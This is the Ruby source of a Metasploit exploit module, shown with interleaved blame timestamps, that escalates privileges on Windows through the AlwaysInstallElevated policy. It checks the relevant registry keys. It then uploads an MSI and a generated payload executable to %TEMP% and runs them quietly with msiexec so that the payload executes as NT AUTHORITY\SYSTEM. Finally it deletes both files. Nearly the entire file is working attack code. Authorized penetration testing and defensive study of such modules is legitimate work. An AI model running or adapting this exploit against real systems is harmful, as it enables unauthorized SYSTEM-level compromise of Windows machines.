metasploit-framework/modules/exploits/windows/local/always_install_elevated.rb

169 lines
5.2 KiB
Ruby
Raw Normal View History

2012-11-22 10:26:23 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
2012-11-27 23:26:19 +00:00
require 'msf/core/post/common'
require 'msf/core/post/file'
2012-11-22 10:26:23 +00:00
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Exploit::EXE
2012-11-27 23:26:19 +00:00
include Msf::Post::Common
include Msf::Post::File
2012-11-22 10:26:23 +00:00
include Msf::Post::Windows::Registry
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows AlwaysInstallElevated MSI',
'Description' => %q{
This module checks the AlwaysInstallElevated registry keys which
dictate if .MSI files should be installed with elevated privileges
(NT AUTHORITY\SYSTEM).
2012-11-27 20:55:36 +00:00
The default MSI file is data/exploits/exec_payload.msi with the WiX source
file under external/source/exploits/exec_payload_msi/exec_payload.wxs.
2012-11-27 20:56:52 +00:00
This MSI simply executes payload.exe within the same folder.
2012-11-22 10:26:23 +00:00
The MSI may not execute succesfully successive times.
2012-11-27 18:31:54 +00:00
MSI can be rebuilt from the source using the WIX tool with the following commands:
candle exec_payload.wxs
light exec_payload.wixobj
2012-11-22 10:26:23 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ben Campbell',
2012-11-27 23:33:07 +00:00
'Parvez Anwar' # discovery?/inspiration
2012-11-22 10:26:23 +00:00
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows', { } ],
],
'References' =>
[
[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
[ 'URL', 'http://wix.sourceforge.net'] ,
],
'DisclosureDate'=> 'Mar 18 2010',
'DefaultTarget' => 0
}))
register_advanced_options([
2012-11-27 20:55:36 +00:00
OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
2012-11-27 23:26:19 +00:00
OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
2012-11-22 10:26:23 +00:00
], self.class)
end
2012-11-22 10:34:05 +00:00
2012-11-22 10:26:23 +00:00
def check
install_elevated = "AlwaysInstallElevated"
installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
hkcu = "HKEY_CURRENT_USER\\#{installer}"
hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
local_machine_value = registry_getvaldata(hklm,install_elevated)
if local_machine_value.nil?
print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
return Msf::Exploit::CheckCode::Safe
elsif local_machine_value == 0
print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
return Msf::Exploit::CheckCode::Safe
else
print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
current_user_value = registry_getvaldata(hkcu,install_elevated)
if current_user_value.nil?
print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
return Msf::Exploit::CheckCode::Safe
elsif current_user_value == 0
print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
return Msf::Exploit::CheckCode::Safe
else
print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
return Msf::Exploit::CheckCode::Vulnerable
end
end
end
def cleanup
if @executed
begin
print_status("Deleting MSI...")
2012-11-27 23:26:19 +00:00
file_rm(@msi_destination)
2012-11-22 10:26:23 +00:00
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
2012-11-27 23:26:19 +00:00
print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
2012-11-22 10:26:23 +00:00
end
begin
print_status("Deleting Payload...")
2012-11-27 23:26:19 +00:00
file_rm(@payload_destination)
2012-11-22 10:26:23 +00:00
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
2012-11-27 23:26:19 +00:00
print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
2012-11-22 10:26:23 +00:00
end
end
end
def exploit
@executed = false
if check == Msf::Exploit::CheckCode::Vulnerable
@executed = true
msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
2012-11-27 18:12:49 +00:00
msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
2012-11-22 10:26:23 +00:00
# Upload MSI
2012-11-27 23:26:19 +00:00
# expand_path in Windows Shell appears to add a newline?
@msi_destination = expand_path("%TEMP%\\#{msi_filename}")
2012-11-22 10:26:23 +00:00
print_status("Uploading the MSI to #{@msi_destination} ...")
2012-11-27 23:33:07 +00:00
#upload_file - ::File.read doesn't appear to work in windows...
2012-11-27 23:26:19 +00:00
source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
write_file(@msi_destination, source)
2012-11-22 10:26:23 +00:00
# Upload payload
payload = generate_payload_exe
2012-11-27 23:26:19 +00:00
@payload_destination = expand_path("%TEMP%\\payload.exe")
2012-11-22 10:26:23 +00:00
print_status("Uploading the Payload to #{@payload_destination} ...")
2012-11-27 23:26:19 +00:00
write_file(@payload_destination, payload)
2012-11-27 23:33:07 +00:00
2012-11-22 10:26:23 +00:00
# Execute MSI
print_status("Executing MSI...")
if datastore['LOG_FILE'].nil?
logging = ""
else
logging = "/l* #{datastore['LOG_FILE']} "
end
2012-11-27 23:33:07 +00:00
2012-11-27 23:26:19 +00:00
if datastore['QUIET']
quiet = "/quiet "
else
quiet = ""
end
2012-11-22 10:26:23 +00:00
2012-11-27 23:26:19 +00:00
cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
2012-11-27 23:33:07 +00:00
vprint_status("Executing: #{cmd}")
2012-11-27 23:26:19 +00:00
result = cmd_exec(cmd)
vprint_status("MSI command-line feedback: #{result}")
2012-11-22 10:26:23 +00:00
end
end
end